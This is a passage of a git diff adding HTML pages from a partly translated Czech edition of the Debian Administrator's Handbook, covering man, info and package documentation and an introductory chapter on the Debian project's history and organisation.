+                  class="computeroutput">scp (1)     - secure copy (remote file copy program)</code></pre><div
+                class="para">
+				This short description is included in the <span
+                  class="emphasis"><em>NAME</em></span> section at the beginning of all manual pages.
+			</div></div><div
+              class="para">
+				Of course, if you do not know the names of the commands, the manual is not going to be of much use to you. This is the purpose of the <code
+                class="command">apropos</code> command, which helps you conduct a search in the manual pages, or more specifically in their short descriptions. Each manual page begins essentially with a one line summary. <code
+                class="command">apropos</code> returns a list of manual pages whose summary mentions the requested keyword(s). If you choose them well, you will find the name of the command that you need.
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.10.4.4.13"></a><p
+                class="title"><strong>Příklad 7.1. Finding <code
+                    class="command">cp</code> with <code
+                    class="command">apropos</code></strong></p><div
+                class="example-contents"><pre
+                  class="screen">
+<code
+                    class="computeroutput">$ </code><strong
+                    class="userinput"><code>apropos "copy file"</code></strong>
+<code
+                    class="computeroutput">cp (1)               - copy files and directories
+cpio (1)             - copy files to and from archives
+gvfs-copy (1)        - Copy files
+gvfs-move (1)        - Copy files
+hcopy (1)            - copy files from or to an HFS volume
+install (1)          - copy files and set attributes
+ntfscp (8)           - copy file to an NTFS volume.
+</code></pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Browsing by following links</strong></p></div></div></div><div
+                class="para">
+				Many manual pages have a “SEE ALSO” section, usually at the end. It refers to other manual pages relevant to similar commands, or to external documentation. In this way, it is possible to find relevant documentation even when the first choice is not optimal.
+			</div></div><div
+              class="para">
+				The <code
+                class="command">man</code> command is not the only means of consulting the manual pages, since <code
+                class="command">khelpcenter</code> and <code
+                class="command">konqueror</code> (by KDE) and <code
+                class="command">yelp</code> (under GNOME) programs also offer this possibility. There is also a web interface, provided by the <code
+                class="command">man2html</code> package, which allows you to view manual pages in a web browser. On a computer where this package is installed, use this URL: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://localhost/cgi-bin/man/man2html">http://localhost/cgi-bin/man/man2html</a></div>
+			</div><div
+              class="para">
+				This utility requires a web server. This is why you should choose to install this package on one of your servers: all users of the local network could benefit from this service (including non-Linux machines), and this will allow you not to set up an HTTP server on each workstation. If your server is also accessible from other networks, it may be desirable to restrict access to this service only to users of the local network.
+			</div><a
+              id="id-1.10.4.4.17"
+              class="indexterm"></a><div
+              class="para">
+				Last but not least, you can view all manual pages available in Debian (even those that are not installed on your machine) on the <code
+                class="literal">manpages.debian.org</code> service. It offers each manual page in multiple versions, one for each Debian release. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://manpages.debian.org">https://manpages.debian.org</a></div>
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DEBIAN POLICY</em></span> Required man pages</strong></p></div></div></div><div
+                class="para">
+				Debian requires each program to have a manual page. If the upstream author does not provide one, the Debian package maintainer will usually write a minimal page that will at the very least direct the reader to the location of the original documentation.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.10.4.5"></a>7.1.2. <span
+                      class="emphasis"><em>info</em></span> Documents</h3></div></div></div><a
+              id="id-1.10.4.5.2"
+              class="indexterm"></a><a
+              id="id-1.10.4.5.3"
+              class="indexterm"></a><div
+              class="para">
+				The GNU project has written manuals for most of its programs in the <span
+                class="emphasis"><em>info</em></span> format; this is why many manual pages refer to the corresponding <span
+                class="emphasis"><em>info</em></span> documentation. This format offers some advantages, but the default program to view these documents (it is called <code
+                class="command">info</code>) is also slightly more complex. You would be well advised to use <code
+                class="command">pinfo</code> instead (from the <span
+                class="pkg pkg">pinfo</span> package).
+			</div><a
+              id="id-1.10.4.5.5"
+              class="indexterm"></a><div
+              class="para">
+				The <span
+                class="emphasis"><em>info</em></span> documentation has a hierarchical structure, and if you invoke <code
+                class="command">pinfo</code> without parameters, it will display a list of the nodes available at the first level. Usually, nodes bear the name of the corresponding commands.
+			</div><div
+              class="para">
+				With <code
+                class="command">pinfo</code> navigating between these nodes is easy to achieve with the arrow keys. Alternatively, you could also use a graphical browser, which is a lot more user-friendly. Again, <code
+                class="command">konqueror</code> and <code
+                class="command">yelp</code> work; the <code
+                class="command">info2www</code> also provides a web interface. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://localhost/cgi-bin/info2www">http://localhost/cgi-bin/info2www</a></div>
+			</div><a
+              id="id-1.10.4.5.8"
+              class="indexterm"></a><div
+              class="para">
+				Note that the <span
+                class="emphasis"><em>info</em></span> system is not suitable for translation, unlike the <code
+                class="command">man</code> page system. <span
+                class="emphasis"><em>info</em></span> documents are thus almost always in English. However, when you ask the <code
+                class="command">pinfo</code> program to display a non-existing <span
+                class="emphasis"><em>info</em></span> page, it will fall back on the <span
+                class="emphasis"><em>man</em></span> page by the same name (if it exists), which might be translated.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.10.4.6"></a>7.1.3. Specific Documentation</h3></div></div></div><a
+              id="id-1.10.4.6.2"
+              class="indexterm"></a><div
+              class="para">
+				Each package includes its own documentation. Even the least well documented programs generally have a <code
+                class="filename">README</code> file containing some interesting and/or important information. This documentation is installed in the <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/</code> directory (where <em
+                class="replaceable">package</em> represents the name of the package). If the documentation is particularly large, it may not be included in the program's main package, but might be offloaded to a dedicated package which is usually named <code
+                class="literal"><em
+                  class="replaceable">package</em>-doc</code>. The main package generally recommends the documentation package so that you can easily find it.
+			</div><a
+              id="id-1.10.4.6.4"
+              class="indexterm"></a><a
+              id="id-1.10.4.6.5"
+              class="indexterm"></a><a
+              id="id-1.10.4.6.6"
+              class="indexterm"></a><div
+              class="para">
+				The <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/</code> directory also contains some files provided by Debian which complete the documentation by specifying the package's particularities or improvements compared to a traditional installation of the software. The <code
+                class="filename">README.Debian</code> file also indicates all of the adaptations that were made to comply with the Debian Policy. The <code
+                class="filename">changelog.Debian.gz</code> file allows the user to follow the modifications made to the package over time: it is very useful to try to understand what has changed between two installed versions that do not have the same behavior. Finally, there is sometimes a <code
+                class="filename">NEWS.Debian.gz</code> file which documents the major changes in the program that may directly concern the administrator.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.10.4.7"></a>7.1.4. Websites</h3></div></div></div><div
+              class="para">
+				In most cases, free software programs have websites that are used to distribute it and to bring together the community of its developers and users. These sites are frequently loaded with relevant information in various forms: official documentation, FAQ (Frequently Asked Questions), mailing list archives, etc. Problems that you may encounter have often already been the subject of many questions; the FAQ or mailing list archives may have a solution for it. A good mastery of search engines will prove immensely valuable to find relevant pages quickly (by restricting the search to the Internet domain or sub-domain dedicated to the program). If the search returns too many pages or if the results do not match what you seek, you can add the keyword <strong
+                class="userinput"><code>debian</code></strong> to limit results and target relevant information.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIPS</em></span> From error to solution</strong></p></div></div></div><div
+                class="para">
+				If the software returns a very specific error message, enter it into the search engine (between double quotes, <code
+                  class="literal">"</code>, in order to search not for individual keywords, but for the complete phrase). In most cases, the first links returned will contain the answer that you need.
+			</div><div
+                class="para">
+				In other cases, you will get very general errors, such as “Permission denied”. In this case, it is best to check the permissions of the elements involved (files, user ID, groups, etc.).
+			</div></div><div
+              class="para">
+				If you do not know the address for the software's website, there are various means of getting it. First, check if there is a <code
+                class="literal">Homepage</code> field in the package's meta-information (<code
+                class="command">apt show <em
+                  class="replaceable">package</em></code>). Alternately, the package description may contain a link to the program's official website. If no URL is indicated, look at <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/copyright</code>. The Debian maintainer generally indicates in this file where they got the program's source code, and this is likely to be the website that you need to find. If at this stage your search is still unfruitful, consult a free software directory, such as FSF's Free Software Directory, or search directly with a search engine, such as Google, DuckDuckGo, Yahoo, etc. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://directory.fsf.org/wiki/Main_Page">https://directory.fsf.org/wiki/Main_Page</a></div>
+			</div><a
+              id="id-1.10.4.7.5"
+              class="indexterm"></a><a
+              id="id-1.10.4.7.6"
+              class="indexterm"></a><div
+              class="para">
+				You might also want to check the Debian wiki, a collaborative website where anybody, even simple visitors, can make suggestions directly from their browsers. It is used equally by developers who design and specify their projects, and by users who share their knowledge by writing documents collaboratively. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.debian.org/">http://wiki.debian.org/</a></div>
+			</div><a
+              id="id-1.10.4.7.8"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.10.4.8"></a>7.1.5. Tutorials (<span
+                      class="emphasis"><em>HOWTO</em></span>)</h3></div></div></div><a
+              id="id-1.10.4.8.2"
+              class="indexterm"></a><div
+              class="para">
+				A howto is a document that describes, in concrete terms and step by step, “how to” reach a predefined goal. The covered goals are relatively varied, but often technical in nature: for example, setting up IP Masquerading, configuring software RAID, installing a Samba server, etc. These documents often attempt to cover all of the potential problems likely to occur during the implementation of a given technology.
+			</div><div
+              class="para">
+				Many such tutorials are managed by the Linux Documentation Project (LDP), whose website hosts all of these documents: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.tldp.org/">http://www.tldp.org/</a></div>
+			</div><a
+              id="id-1.10.4.8.5"
+              class="indexterm"></a><a
+              id="id-1.10.4.8.6"
+              class="indexterm"></a><div
+              class="para">
+				These documents should be taken with a grain of salt. They are often several years old; the information they contain is sometimes obsolete. This phenomenon is even more frequent for their translations, since updates are neither systematic nor instant after the publication of a new version of the original documents. This is part of the joys of working in a volunteer environment and without constraints…
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.searching-packages.html"><strong>Předcházející</strong>6.9. Searching for Packages</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.common-procedures.html"><strong>Další</strong>7.2. Common Procedures</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/the-debian-project.html b/publish/cs-CZ/Debian/9/html/debian-handbook/the-debian-project.html
new file mode 100644
index 000000000..2b825ec26
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/the-debian-project.html
@@ -0,0 +1,345 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 1. Projekt Debian</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.acknowledgments.html"
+        title="5. Poděkování" /><link
+        rel="next"
+        href="sect.foundation-documents.html"
+        title="1.2. Dokumenty nadace" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/the-debian-project.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.acknowledgments.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.foundation-documents.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="the-debian-project"></a>Kapitola 1. Projekt Debian</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="the-debian-project.html#sect.what-is-debian">1.1. Co je Debian?</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="the-debian-project.html#id-1.4.4.8">1.1.1. Multiplatformní operační systém</a></span></dt><dt><span
+                    class="section"><a
+                      href="the-debian-project.html#id-1.4.4.9">1.1.2. Kvalita svobodného softwaru</a></span></dt><dt><span
+                    class="section"><a
+                      href="the-debian-project.html#id-1.4.4.10">1.1.3. Právní rámec: nezisková organizace</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.foundation-documents.html">1.2. Dokumenty nadace</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.foundation-documents.html#sect.social-contract">1.2.1. Závazek vůči uživatelům</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.foundation-documents.html#sect.dfsg">1.2.2. Pokyny Debianu pro svobodný software</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.debian-internals.html">1.3. Vnitřní fungování projektu Debian</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.debian-internals.html#id-1.4.6.5">1.3.1. Vývojáři Debianu</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.debian-internals.html#id-1.4.6.6">1.3.2. Aktivní role uživatelů</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.debian-internals.html#id-1.4.6.7">1.3.3. Týmy a podprojekty</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.follow-debian-news.html">1.4. Follow Debian News</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.role-of-distributions.html">1.5. The Role of Distributions</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.role-of-distributions.html#id-1.4.8.4">1.5.1. The Installer: <code
+                        class="command">debian-installer</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.role-of-distributions.html#id-1.4.8.5">1.5.2. The Software Library</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.release-lifecycle.html">1.6. Lifecycle of a Release</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html#id-1.4.9.11">1.6.1. The <span
+                        class="distribution distribution">Experimental</span> Status</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html#id-1.4.9.12">1.6.2. The <span
+                        class="distribution distribution">Unstable</span> Status</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html#id-1.4.9.13">1.6.3. Migration to <span
+                        class="distribution distribution">Testing</span></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html#id-1.4.9.14">1.6.4. The Promotion from <span
+                        class="distribution distribution">Testing</span> to <span
+                        class="distribution distribution">Stable</span></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.release-lifecycle.html#id-1.4.9.15">1.6.5. The <span
+                        class="distribution distribution">Oldstable</span> and <span
+                        class="distribution distribution">Oldoldstable</span> Status</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		Než se ponoříme přímo do technologie, pojďme se podívat na to, co to je projekt Debian, jeho cíle, jeho prostředky a jeho provoz.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.what-is-debian"></a>1.1. Co je Debian?</h2></div></div></div><a
+            id="id-1.4.4.2"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Origin of the Debian name</strong></p></div></div></div><div
+              class="para">
+			Nehledejte dále: Debian není zkratka. Tento název je ve skutečnosti spojení dvou křestních jmen: a to Iana Murdocka, a v té době jeho přítelkyně, Debry. Debra + Ian = Debian.
+		</div></div><div
+            class="para">
+			Debian je distribuce GNU/Linuxu. O tom, co to je distribuce budeme diskutovat podrobněji v části <a
+              class="xref"
+              href="sect.role-of-distributions.html">1.5 – „The Role of Distributions“</a>, ale nyní budeme jednoduše konstatovat, že se jedná o kompletní operační systém, včetně softwaru a systémů pro instalaci a řízení, vše na základě Linuxového jádra a svobodného softwaru (zejména z projektu GNU).
+		</div><div
+            class="para">
+			Když v roce 1993, pod vedením FSF, vytvořil Debian, měl Ian Murdock jasné cíle, které vyjádřil v <span
+              class="emphasis"><em>Manifestu Debianu</em></span>. Svobodný operační systém, o který usiloval, musel mít dva hlavní rysy. Za prvé, kvalitu: Debian musí být vyvinut s největší péčí, aby byl hoden linuxového jádra. Musí být rovněž nekomerční distribucí, která dostatečně věrohodně konkuruje velkým komerčním distribucím. Této dvojí ambice by bylo v jeho očích možné dosáhnout pouze otevřením procesu vývoje Debianu, stejně jako v případě Linuxu a projektu GNU. Vzájemná kontrola by tedy neustále tento produkt zlepšovala.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KULTURA</em></span> GNU, projekt od FSF</strong></p></div></div></div><a
+              id="id-1.4.4.6.2"
+              class="indexterm"></a><a
+              id="id-1.4.4.6.3"
+              class="indexterm"></a><div
+              class="para">
+			Projekt GNU je řada svobodného softwaru vyvíjeného nebo sponzorovaného nadací Free Software Foundation (FSF), založené svým kultovním vůdcem, Dr. Richardem M. Stallmanem. GNU je rekurzivní zkratka znamenající “GNU Není Unix”.
+		</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KULTURA</em></span> Richard Stallman</strong></p></div></div></div><a
+              id="id-1.4.4.7.2"
+              class="indexterm"></a><a
+              id="id-1.4.4.7.3"
+              class="indexterm"></a><div
+              class="para">
+			<acronym
+                class="acronym">FSF</acronym>'s founder and author of the GPL license, Richard M. Stallman (often referred to by his initials, RMS) is a charismatic leader of the Free Software movement. Due to his uncompromising positions, he is not unanimously admired, but his non-technical contributions to Free Software (in particular at the legal and philosophical level) are respected by everybody.
+		</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.4.4.8"></a>1.1.1. Multiplatformní operační systém</h3></div></div></div><a
+              id="id-1.4.4.8.2"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>Společenství</em></span> cesta Iana Murdocka</strong></p></div></div></div><a
+                id="id-1.4.4.8.3.2"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.3.3"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.3.4"
+                class="indexterm"></a><div
+                class="para">
+				Ian Murdock, zakladatel projektu Debian, byl jeho první vůdce od roku 1993 do roku 1996. Po předání štafety Bruceu Perensovi zhostil se Ian méně veřejné role. Vrátil se do práce v zákulisí společenství Svobodného softwaru vytvořením firmy Progeny, se záměrem prodávat distribuci odvozenou z Debianu. Tento podnik se stal, bohužel, obchodním nezdarem a vývoj byl ukončen. Společnost, po několika letech přežívání, pouze jako poskytovatel služeb, nakonec v dubnu 2007 vyhlásil bankrot. Z různých projektů započaté Progeny, pouze <span
+                  class="emphasis"><em>discover </em></span> stále zůstává. Jedná se o automatický nástroj pro detekci hardwaru.
+			</div><div
+                class="para">
+				Ian Murdock died on 28 December 2015 in San Francisco after a series of worrying tweets where he reported having been assaulted by police. In July 2016 it was announced that his death had been ruled a suicide.
+			</div></div><div
+              class="para">
+				Debian, remaining true to its initial principles, has had so much success that, today, it has reached a tremendous size. The 12 architectures offered cover 10 hardware architectures and 2 kernels (Linux and FreeBSD, although the FreeBSD-based ports are not part of the set of officially supported architectures). Furthermore, with more than 25,000 source packages, the available software can meet almost any need that one could have, whether at home or in the enterprise.
+			</div><div
+              class="para">
+				The sheer size of the distribution can be inconvenient: it is really unreasonable to distribute 14 DVD-ROMs to install a complete version on a standard PC… This is why Debian is increasingly considered as a “meta-distribution”, from which one extracts more specific distributions intended for a particular public: Debian-Desktop for traditional office use, Debian-Edu for education and pedagogical use in an academic environment, Debian-Med for medical applications, Debian-Junior for young children, etc. A more complete list of the subprojects can be found in the section dedicated to that purpose, see <a
+                class="xref"
+                href="sect.debian-internals.html#sect.sub-projects">1.3.3.1 – „Současné podprojekty Debianu“</a>.
+			</div><div
+              class="para">
+				Tyto dílčí pohledy na Debian jsou organizovány v dobře definovaném rámci, což zaručuje bezproblémovou kompatibilitu mezi různými “sub-distribucemi”. Každá z nich se řídí obecným plánem pro vydávání nových verzí. A protože staví na stejných základech, mohou být snadno rozšířeny, dokončeny a personalizovány s aplikacemi dostupnými v repozitářích Debianu.
+			</div><a
+              id="id-1.4.4.8.7"
+              class="indexterm"></a><div
+              class="para">
+				Všechny nástroje Debianu fungují v tomto sledu: <code
+                class="command">debian-cd</code> má již dlouhou dobu povoleno vytvoření sady CD-ROM obsahujících pouze předem vybraný soubor balíků; <code
+                class="command">debian-installer</code> je také modulární instalátor, který se snadno přizpůsobí zvláštním potřebám. <code
+                class="command">APT</code> bude instalovat balíky z různých zdrojů a zároveň garantovat celkovou konzistenci systému.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NÁSTROJ</em></span> Vytvoření CD-ROM Debianu</strong></p></div></div></div><a
+                id="id-1.4.4.8.9.2"
+                class="indexterm"></a><div
+                class="para">
+				<code
+                  class="command">debian-cd</code> vytváří ISO obrazy instalačních médií (CD, DVD, Blu-ray, atd.) připravené k použití. Jakékoliv záležitosti týkající se tohoto softwaru jsou diskutovány (v angličtině) na <code
+                  class="email"><a
+                    class="email"
+                    href="mailto:debian-cd@lists.debian.org">debian-cd@lists.debian.org</a></code> mailing listu. Tým je pod vedením Steva McIntyra, který řídí oficiální ISO stavební části Debianu.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Do každého počítače, jeho architektura</strong></p></div></div></div><div
+                class="para">
+				Termín “architektura” označuje typ počítače (mezi nejvíce známé patří Mac nebo PC). U každé architektury dělá odlišnost především její procesor, obvykle nekompatibilní s ostatními procesory. Tyto rozdíly v hardwaru obnášejí různé provozní prostředky, což vyžaduje, aby byl software kompilován specificky pro každou architekturu.
+			</div><a
+                id="id-1.4.4.8.10.3"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.10.4"
+                class="indexterm"></a><div
+                class="para">
+				Většina softwaru dostupného v Debianu je napsána v přenosných programovacích jazycích: stejný zdrojový kód může být sestaven pro různé architektury. Ve skutečnosti, spustitelný binární soubor, který je kompilován pro specifickou architekturu, nebude obvykle fungovat na ostatních architekturách.
+			</div><div
+                class="para">
+				Připomeňme si, že každý program je vytvořen napsáním zdrojového kódu; tento zdrojový kód je textový soubor složený z instrukcí v daném programovacím jazyce. Než budete moci software používat, je nutné zkompilovat zdrojový kód, což znamená transformovat kód do binárního souboru (série instrukcí stroje spustitelného procesorem). Každý programovací jazyk má konkrétní kompilátor pro provedení této operace (například <code
+                  class="command">gcc</code> pro programovací jazyk C).
+			</div><a
+                id="id-1.4.4.8.10.7"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.10.8"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.10.9"
+                class="indexterm"></a><a
+                id="id-1.4.4.8.10.10"
+                class="indexterm"></a></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NÁSTROJ</em></span> Instalátor</strong></p></div></div></div><a
+                id="id-1.4.4.8.11.2"
+                class="indexterm"></a><div
+                class="para">
+				<code
+                  class="command">debian-installer</code> je název instalačního programu Debianu. Jeho modulární konstrukce umožňuje použití v širokém rozsahu instalačních scénářů. Vývojové práce jsou koordinovány na <code
+                  class="email"><a
+                    class="email"
+                    href="mailto:debian-boot@lists.debian.org">debian-boot@lists.debian.org</a></code> mailing listu pod vedením Cyrila Bruleboise.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.4.4.9"></a>1.1.2. Kvalita svobodného softwaru</h3></div></div></div><div
+              class="para">
+				Debian dodržuje všechny principy svobodného softwaru a jeho nové verze nejsou uvolněny, dokud nejsou připraveny. Vývojáři nejsou nuceni stanoveným plánem spěchat kvůli splnění nějakého termínu. Lidé si často stěžují na dlouhou dobu mezi stabilními verzemi Debianu, ale tato opatrnost také zajišťuje legendární spolehlivost Debianu: dlouhé měsíce testování jsou skutečně nezbytné pro úplnou distribuci k získání štítku “stabilní”.
+			</div><div
+              class="para">
+				Debian nebude dělat kompromisy ve kvalitě: všechny známé kritické chyby jsou vyřešeny v jakékoli nové verzi, i když to vyžaduje odsunutí původně předpokládaného datum vydání.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.4.4.10"></a>1.1.3. Právní rámec: nezisková organizace</h3></div></div></div><div
+              class="para">
+				Po právní stránce, Debian je projekt řízený Americkou neziskovou, dobrovolnickou asociací. Projekt má kolem tisíce <span
+                class="emphasis"><em>vývojářů Debianu</em></span>, ale sdružuje mnohem větší počet přispěvatelů (překladatelů, těch, co hlásí chyby, umělců, příležitostných vývojářů, atd.).
+			</div><div
+              class="para">
+				Aby se porjekt mohl uskutečnit, má Debian širokou infrastrukturu, s mnoha servery připojenými přes internet, poskytnutými velkým počtem sponzorů.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>KOMUNITA</em></span> Za Debianem, asociace SPI, a místní pobočky</strong></p></div></div></div><a
+                id="id-1.4.4.10.4.2"
+                class="indexterm"></a><a
+                id="id-1.4.4.10.4.3"
+                class="indexterm"></a><a
+                id="id-1.4.4.10.4.4"
+                class="indexterm"></a><a
+                id="id-1.4.4.10.4.5"
+                class="indexterm"></a><div
+                class="para">
+				Debian doesn't own any server in its own name, since it is only a project within the <span
+                  class="emphasis"><em>Software in the Public Interest</em></span> association, and SPI manages the hardware and financial aspects (donations, purchase of hardware, etc.). While initially created specifically for the Debian project, this association now hosts other free software projects, especially the PostgreSQL database, Freedesktop.org (project for standardization of various parts of modern graphical desktop environments, such as GNOME and KDE Plasma), and the Libre Office office suite. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.spi-inc.org/">http://www.spi-inc.org/</a></div>
+			</div><div
+                class="para">
+				Kromě SPI s Debianem úzce spolupracují různá místní sdružení za účelem vytváření finančních prostředků pro projekt, bez centralizace všeho v USA: v žargonu Debianu jsou označovány za “důvěryhodné organizace”. Toto uspořádání umožňuje vyhnout se neúměrným mezinárodním nákladům za převod a dobře se hodí k decentralizované povaze projektu.
+			</div><div
+                class="para">
+				While the list of trusted organizations is rather short, there are many more Debian-related associations whose goal is to promote Debian: <span
+                  class="emphasis"><em>Debian France</em></span>, <span
+                  class="emphasis"><em>Debian-ES</em></span>, <span
+                  class="emphasis"><em>debian.ch</em></span>, and others around the world. Do not hesitate to join your local association and support the project! <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://wiki.debian.org/Teams/Auditor/Organizations">https://wiki.debian.org/Teams/Auditor/Organizations</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://france.debian.net/">https://france.debian.net/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.debian-es.org/">http://www.debian-es.org/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://debian.ch/">https://debian.ch/</a></div>
+			</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.acknowledgments.html"><strong>Předcházející</strong>5. Poděkování</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.foundation-documents.html"><strong>Další</strong>1.2. Dokumenty nadace</a></li></ul></body></html>
